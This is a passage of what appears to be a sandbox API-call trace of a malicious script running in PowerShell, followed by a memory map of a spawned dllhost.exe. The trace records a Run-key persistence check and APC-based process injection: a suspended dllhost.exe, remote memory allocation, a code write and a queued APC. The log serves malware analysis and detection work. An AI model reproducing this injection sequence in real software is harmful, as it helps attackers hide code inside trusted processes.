nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0046.758] GetLastError () returned 0xcb [0046.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0046.758] GetLastError () returned 0xcb [0046.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0046.758] GetLastError () returned 0xcb [0046.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0046.758] GetLastError () returned 0xcb [0046.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0046.758] GetLastError () returned 0xcb [0046.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0046.759] GetLastError () returned 0xcb [0046.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0046.759] GetLastError () returned 0xcb [0046.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0046.759] GetLastError () returned 0xcb [0046.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0046.759] GetLastError () returned 0xcb [0046.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0046.759] GetLastError () returned 0xcb [0046.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0046.759] GetLastError () returned 0xcb [0046.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll", nBufferLength=0x105, lpBuffer=0x602e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll", lpFilePart=0x0) returned 0x50 [0046.759] GetLastError () returned 0xcb [0046.764] GetModuleHandleW (lpModuleName="user32.dll") returned 0x75120000 [0046.768] GetProcAddress (hModule=0x75120000, lpProcName="CallWindowProcA") returned 0x7514792f [0046.774] CoCreateGuid (in: pguid=0x602dc24 | out: pguid=0x602dc24*(Data1=0xb4adb6c, Data2=0xf9c1, Data3=0x4505, Data4=([0]=0xa9, [1]=0xb1, [2]=0x48, [3]=0xc9, [4]=0x36, [5]=0x2a, [6]=0xfa, [7]=0xf0))) returned 0x0 [0046.775] CoCreateGuid (in: pguid=0x602e1dc | out: pguid=0x602e1dc*(Data1=0x2003c194, Data2=0xb7e9, Data3=0x4f95, Data4=([0]=0xae, [1]=0x8b, [2]=0x9d, [3]=0x11, [4]=0x19, [5]=0xce, [6]=0xd9, [7]=0xdd))) returned 0x0 [0046.786] GetProcAddress (hModule=0x765b0000, lpProcName="VirtualAlloc") returned 0x765c1856 [0046.786] VirtualAlloc (lpAddress=0x0, dwSize=0x232d000, flAllocationType=0x3000, flProtect=0x40) returned 0x6030000 [0046.787] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x765b0000 [0046.787] GetProcAddress (hModule=0x765b0000, lpProcName="GetModuleHandleA") returned 0x765c1245 [0046.787] GetProcAddress (hModule=0x765b0000, lpProcName="GetProcAddress") returned 0x765c1222 [0046.787] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77560000 [0046.787] GetProcAddress (hModule=0x77560000, lpProcName="atoi") returned 0x775ad2f3 [0046.787] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75380000 [0046.788] GetProcAddress (hModule=0x75380000, lpProcName=0x10) returned 0x75386b0e [0046.788] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x77100000 [0046.788] GetProcAddress (hModule=0x77100000, lpProcName="StrStrA") returned 0x7712c45b [0046.788] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x76be0000 [0046.793] GetProcAddress (hModule=0x76be0000, lpProcName="InternetCrackUrlA") returned 0x76bed075 [0046.793] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x753c0000 [0046.794] GetProcAddress (hModule=0x753c0000, lpProcName="UuidCreateSequential") returned 0x753e7c12 [0046.794] LoadLibraryA (lpLibFileName="imagehlp.dll") returned 0x75760000 [0046.808] GetProcAddress (hModule=0x75760000, lpProcName="CheckSumMappedFile") returned 0x75768303 [0046.808] LoadLibraryA (lpLibFileName="USERENV.dll") returned 0x74a50000 [0046.809] GetProcAddress (hModule=0x74a50000, lpProcName="CreateEnvironmentBlock") returned 0x74a51a7a [0046.809] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x76760000 [0046.809] GetProcAddress (hModule=0x76760000, lpProcName="RegCloseKey") returned 0x7677469d [0046.809] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75570000 [0046.809] GetProcAddress (hModule=0x75570000, lpProcName="CoInitialize") returned 0x7558b636 [0047.091] VirtualProtect (in: lpAddress=0x603015f, dwSize=0x78, flNewProtect=0x4, lpflOldProtect=0x602eabc | out: lpflOldProtect=0x602eabc*=0x40) returned 1 [0047.092] VirtualProtect (in: lpAddress=0x603015f, dwSize=0x78, flNewProtect=0x40, lpflOldProtect=0x602eabc | out: lpflOldProtect=0x602eabc*=0x4) returned 1 [0047.092] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77560000 [0047.092] GetProcAddress (hModule=0x77560000, lpProcName="atoi") returned 0x775ad2f3 [0047.092] GetProcAddress (hModule=0x77560000, lpProcName="sscanf") returned 0x776354a7 [0047.092] GetProcAddress (hModule=0x77560000, lpProcName="strncpy") returned 0x775d5c30 [0047.092] GetProcAddress (hModule=0x77560000, lpProcName="ZwSetValueKey") returned 0x775801b4 [0047.093] GetProcAddress (hModule=0x77560000, lpProcName="ZwQueryValueKey") returned 0x7757fa98 [0047.093] GetProcAddress (hModule=0x77560000, lpProcName="ZwQueueApcThread") returned 0x7757ff14 [0047.093] GetProcAddress (hModule=0x77560000, lpProcName="ZwCreateKey") returned 0x7757fb30 [0047.093] GetProcAddress (hModule=0x77560000, lpProcName="RtlRandom") returned 0x776298c3 [0047.093] GetProcAddress (hModule=0x77560000, lpProcName="_snprintf") returned 0x77634760 [0047.093] GetProcAddress (hModule=0x77560000, lpProcName="_vsnprintf") returned 0x775d9d88 [0047.094] GetProcAddress (hModule=0x77560000, lpProcName="RtlImageNtHeader") returned 0x77593164 [0047.094] GetProcAddress (hModule=0x77560000, lpProcName="_chkstk") returned 0x7759ad68 [0047.094] GetProcAddress (hModule=0x77560000, lpProcName="memset") returned 0x7758df20 [0047.094] GetModuleHandleA (lpModuleName="WS2_32.dll") returned 0x75380000 [0047.094] GetProcAddress (hModule=0x75380000, lpProcName=0x10) returned 0x75386b0e [0047.094] GetProcAddress (hModule=0x75380000, lpProcName=0x73) returned 0x75383ab2 [0047.094] GetProcAddress (hModule=0x75380000, lpProcName=0x3) returned 0x75383918 [0047.095] GetProcAddress (hModule=0x75380000, lpProcName=0x13) returned 0x75386f01 [0047.095] GetProcAddress (hModule=0x75380000, lpProcName=0x4) returned 0x75386bdd [0047.095] GetProcAddress (hModule=0x75380000, lpProcName=0x34) returned 0x75397673 [0047.095] GetProcAddress (hModule=0x75380000, lpProcName=0x17) returned 0x75383eb8 [0047.095] GetModuleHandleA (lpModuleName="SHLWAPI.dll") returned 0x77100000 [0047.095] GetProcAddress (hModule=0x77100000, lpProcName="StrStrA") returned 0x7712c45b [0047.095] GetProcAddress (hModule=0x77100000, lpProcName="PathUnquoteSpacesA") returned 0x7712ecc7 [0047.096] GetProcAddress (hModule=0x77100000, lpProcName="PathFindFileNameA") returned 0x771100aa [0047.096] GetProcAddress (hModule=0x77100000, lpProcName="StrCmpNIA") returned 0x7710d11c [0047.096] GetProcAddress (hModule=0x77100000, lpProcName="StrChrA") returned 0x7710c5e6 [0047.096] GetProcAddress (hModule=0x77100000, lpProcName="StrStrIA") returned 0x7710d250 [0047.096] GetModuleHandleA (lpModuleName="WININET.dll") returned 0x76be0000 [0047.096] GetProcAddress (hModule=0x76be0000, lpProcName="InternetCrackUrlA") returned 0x76bed075 [0047.097] GetModuleHandleA (lpModuleName="RPCRT4.dll") returned 0x753c0000 [0047.097] GetProcAddress (hModule=0x753c0000, lpProcName="UuidCreateSequential") returned 0x753e7c12 [0047.097] GetModuleHandleA (lpModuleName="imagehlp.dll") returned 0x75760000 [0047.097] GetProcAddress (hModule=0x75760000, lpProcName="CheckSumMappedFile") returned 0x75768303 [0047.097] GetModuleHandleA (lpModuleName="USERENV.dll") returned 0x74a50000 [0047.097] GetProcAddress (hModule=0x74a50000, lpProcName="CreateEnvironmentBlock") returned 0x74a51a7a [0047.098] GetModuleHandleA (lpModuleName="KERNEL32.dll") returned 0x765b0000 [0047.098] GetProcAddress (hModule=0x765b0000, lpProcName="ExitThread") returned 0x775bd598 [0047.098] GetProcAddress (hModule=0x765b0000, lpProcName="ExitProcess") returned 0x765c7a10 [0047.098] GetProcAddress (hModule=0x765b0000, lpProcName="GetModuleFileNameA") returned 0x765c14b1 [0047.098] GetProcAddress (hModule=0x765b0000, lpProcName="CreateEventA") returned 0x765c328c [0047.098] GetProcAddress (hModule=0x765b0000, lpProcName="TerminateThread") returned 0x765c7a2f [0047.099] GetProcAddress (hModule=0x765b0000, lpProcName="WinExec") returned 0x76642c21 [0047.099] GetProcAddress (hModule=0x765b0000, lpProcName="WriteFile") returned 0x765c1282 [0047.099] GetProcAddress (hModule=0x765b0000, lpProcName="CreateFileA") returned 0x765c53c6 [0047.099] GetProcAddress (hModule=0x765b0000, lpProcName="GetTempFileNameA") returned 0x765e9d3f [0047.099] GetProcAddress (hModule=0x765b0000, lpProcName="GetTempPathA") returned 0x765e276c [0047.100] GetProcAddress (hModule=0x765b0000, lpProcName="Sleep") returned 0x765c10ff [0047.100] GetProcAddress (hModule=0x765b0000, lpProcName="TerminateProcess") returned 0x765dd802 [0047.100] GetProcAddress (hModule=0x765b0000, lpProcName="GetExitCodeThread") returned 0x765dd5b5 [0047.100] GetProcAddress (hModule=0x765b0000, lpProcName="WaitForSingleObject") returned 0x765c1136 [0047.100] GetProcAddress (hModule=0x765b0000, lpProcName="ResumeThread") returned 0x765c43ef [0047.100] GetProcAddress (hModule=0x765b0000, lpProcName="WriteProcessMemory") returned 0x765dd9e0 [0047.100] GetProcAddress (hModule=0x765b0000, lpProcName="VirtualAllocEx") returned 0x765dd9b0 [0047.101] GetProcAddress (hModule=0x765b0000, lpProcName="CreateProcessA") returned 0x765c1072 [0047.101] GetProcAddress (hModule=0x765b0000, lpProcName="ExpandEnvironmentStringsA") returned 0x765deb39 [0047.101] GetProcAddress (hModule=0x765b0000, lpProcName="GetTickCount") returned 0x765c110c [0047.101] GetProcAddress (hModule=0x765b0000, lpProcName="GetVersionExA") returned 0x765c3519 [0047.101] GetProcAddress (hModule=0x765b0000, lpProcName="CloseHandle") returned 0x765c1410 [0047.101] GetProcAddress (hModule=0x765b0000, lpProcName="LoadLibraryA") returned 0x765c49d7 [0047.101] GetProcAddress (hModule=0x765b0000, lpProcName="GetProcAddress") returned 0x765c1222 [0047.102] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0047.102] GetProcAddress (hModule=0x765b0000, lpProcName="GetLastError") returned 0x765c11c0 [0047.102] GetProcAddress (hModule=0x765b0000, lpProcName="GetModuleHandleA") returned 0x765c1245 [0047.102] GetProcAddress (hModule=0x765b0000, lpProcName="VirtualFree") returned 0x765c186e [0047.102] GetProcAddress (hModule=0x765b0000, lpProcName="VirtualAlloc") returned 0x765c1856 [0047.103] GetModuleHandleA (lpModuleName="ADVAPI32.dll") returned 0x76760000 [0047.103] GetProcAddress (hModule=0x76760000, lpProcName="RegSetValueExW") returned 0x767714d6 [0047.103] GetProcAddress (hModule=0x76760000, lpProcName="RegQueryValueExW") returned 0x767746ad [0047.103] GetProcAddress (hModule=0x76760000, lpProcName="RegQueryValueExA") returned 0x767748ef [0047.103] GetProcAddress (hModule=0x76760000, lpProcName="RegSetValueExA") returned 0x767714b3 [0047.103] GetProcAddress (hModule=0x76760000, lpProcName="RegCreateKeyExA") returned 0x76771469 [0047.103] GetProcAddress (hModule=0x76760000, lpProcName="RegCloseKey") returned 0x7677469d [0047.104] GetProcAddress (hModule=0x76760000, lpProcName="OpenProcessToken") returned 0x76774304 [0047.104] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x75570000 [0047.104] GetProcAddress (hModule=0x75570000, lpProcName="CoInitialize") returned 0x7558b636 [0047.104] UuidCreateSequential (in: Uuid=0x602e9ac | out: Uuid=0x602e9ac) returned 0x0 [0047.104] _snprintf (in: _Dest=0x835a648, _Count=0x103, _Format="%x%x%x%x%x%x" | out: _Dest="c43dc7584a0") returned 11 [0047.104] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName="c43dc7584a0") returned 0x384 [0047.104] GetLastError () returned 0x0 [0047.104] GetModuleHandleA (lpModuleName=0x0) returned 0x22550000 [0047.104] GetModuleFileNameA (in: hModule=0x22550000, lpFilename=0x602e9c8, nSize=0x104 | out: lpFilename="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0047.104] StrStrIA (lpFirst="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe", lpSrch="powershell.exe") returned="powershell.exe" [0047.104] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x602eae8 | out: TokenHandle=0x602eae8*=0x40c) returned 1 [0047.104] CreateEnvironmentBlock () returned 0x1 [0047.108] CloseHandle (hObject=0x384) returned 1 [0047.108] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="software\\microsoft\\windows\\currentversion\\run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf013f, lpSecurityAttributes=0x0, phkResult=0x602e9ac, lpdwDisposition=0x0 | out: phkResult=0x602e9ac*=0x384, lpdwDisposition=0x0) returned 0x0 [0047.108] NtCreateKey (in: KeyHandle=0x602e9b0, DesiredAccess=0xf013f, ObjectAttributes=0x602e988*(Length=0x18, RootDirectory=0x384, ObjectName="\x01", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x602e9b0*=0x3a8) returned 0x0 [0047.108] RegQueryValueExA (in: hKey=0x3a8, lpValueName="f", lpReserved=0x0, lpType=0x0, lpData=0x633934c, lpcbData=0x602ead4*=0x0 | out: lpType=0x0, lpData=0x633934c*=0x0, lpcbData=0x602ead4*=0x0) returned 0x2 [0047.108] RegCloseKey (hKey=0x3a8) returned 0x0 [0047.108] RegCloseKey (hKey=0x384) returned 0x0 [0047.109] _alloca_probe () returned 0x603181a [0047.109] GetModuleHandleA (lpModuleName="kernel32") returned 0x765b0000 [0047.109] GetProcAddress (hModule=0x765b0000, lpProcName="IsWow64Process") returned 0x765c195e [0047.109] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x602d94c | out: Wow64Process=0x602d94c) returned 1 [0047.109] ExpandEnvironmentStringsA (in: lpSrc="%windir%\\syswow64\\dllhost.exe", lpDst=0x602d95c, nSize=0x1000 | out: lpDst="C:\\Windows\\syswow64\\dllhost.exe") returned 0x20 [0047.109] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\syswow64\\dllhost.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x404, lpEnvironment=0x54a1f38, lpCurrentDirectory=0x0, lpStartupInfo=0x602e95c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x602e9a0 | out: lpCommandLine="C:\\Windows\\syswow64\\dllhost.exe", lpProcessInformation=0x602e9a0*(hProcess=0x3a8, hThread=0x384, dwProcessId=0xa94, dwThreadId=0xa98)) returned 1 [0047.131] VirtualAllocEx (hProcess=0x3a8, lpAddress=0x0, dwSize=0x3b04, flAllocationType=0x3000, flProtect=0x40) returned 0x60000 [0047.131] WriteProcessMemory (in: hProcess=0x3a8, lpBaseAddress=0x60000, lpBuffer=0x2e621e8*, nSize=0x3b04, lpNumberOfBytesWritten=0x2e631e8 | out: lpBuffer=0x2e621e8*, lpNumberOfBytesWritten=0x2e631e8*=0x3b04) returned 1 [0047.132] NtQueueApcThread (ThreadHandle=0x384, ApcRoutine=0x60000, NormalContext=0x60000, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0047.132] ResumeThread (hThread=0x384) returned 0x1 [0047.132] WaitForSingleObject (hHandle=0x384, dwMilliseconds=0xffffffff) returned 0x0 [0047.491] GetExitCodeThread (in: hThread=0x384, lpExitCode=0x602e9bc | out: lpExitCode=0x602e9bc) returned 1 [0047.491] CloseHandle (hObject=0x384) returned 1 [0047.492] ExitProcess (uExitCode=0x2a) Process: id = "4" image_name = "dllhost.exe" filename = "c:\\windows\\syswow64\\dllhost.exe" page_root = "0x5e037000" os_pid = "0xa94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xa58" cmd_line = "C:\\Windows\\syswow64\\dllhost.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010611" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 570 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 571 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 572 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 573 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 574 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 575 start_va = 0x190000 end_va = 0x194fff entry_point = 0x190000 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\SysWOW64\\dllhost.exe" (normalized: "c:\\windows\\syswow64\\dllhost.exe") Region: id = 576 start_va = 0x270000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 577 start_va = 0x77380000 end_va = 0x77528fff entry_point = 0x77380000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 578 start_va = 0x77560000 end_va = 0x776dffff entry_point = 0x77560000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 579 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 580 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 581 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 582 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 583 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 584 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 585 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 586 start_va = 0x60000 end_va = 0x63fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 587 start_va = 0x410000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 588 start_va = 0x73a70000 end_va = 0x73acbfff entry_point = 0x73aaf798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 589 start_va = 0x73ad0000 end_va = 0x73b0efff entry_point = 0x73afde78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 590 start_va = 0x73b40000 end_va = 0x73b47fff entry_point = 0x73b420f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 591 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 592 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 593 start_va = 0x5f0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 594 start_va = 0x8c0000 end_va = 0x8cffff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 595 start_va = 0x750b0000 end_va = 0x750bbfff entry_point = 0x750b10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 596 start_va = 0x750c0000 end_va = 0x7511ffff entry_point = 0x750da3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 597 start_va = 0x75120000 end_va = 0x7521ffff entry_point = 0x7513b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 598 start_va = 0x75240000 end_va = 0x75258fff entry_point = 0x75244975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 599 start_va = 0x75260000 end_va = 0x7530bfff entry_point = 0x7526a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 600 start_va = 0x75320000 end_va = 0x75365fff entry_point = 0x75327478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 601 start_va = 0x753c0000 end_va = 0x754affff entry_point = 0x753d0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 602 start_va = 0x754e0000 end_va = 0x7556ffff entry_point = 0x754f6343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 603 start_va = 0x75570000 end_va = 0x756cbfff entry_point = 0x755bba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 604 start_va = 0x765b0000 end_va = 0x766bffff entry_point = 0x765c32d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 605 start_va = 0x76750000 end_va = 0x76759fff entry_point = 0x767536a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 606 start_va = 0x76760000 end_va = 0x767fffff entry_point = 0x767749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 607 start_va = 0x76b30000 end_va = 0x76bccfff entry_point = 0x76b63fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 608 start_va = 0x77160000 end_va = 0x77259fff entry_point = 0x0 region_type = private name = "private_0x0000000077160000" filename = "" Region: id = 609 start_va = 0x77260000 end_va = 0x7737efff entry_point = 0x0 region_type = private name = "private_0x0000000077260000" filename = "" Region: id = 610 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 611 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 612 start_va = 0x6f0000 end_va = 0x877fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" 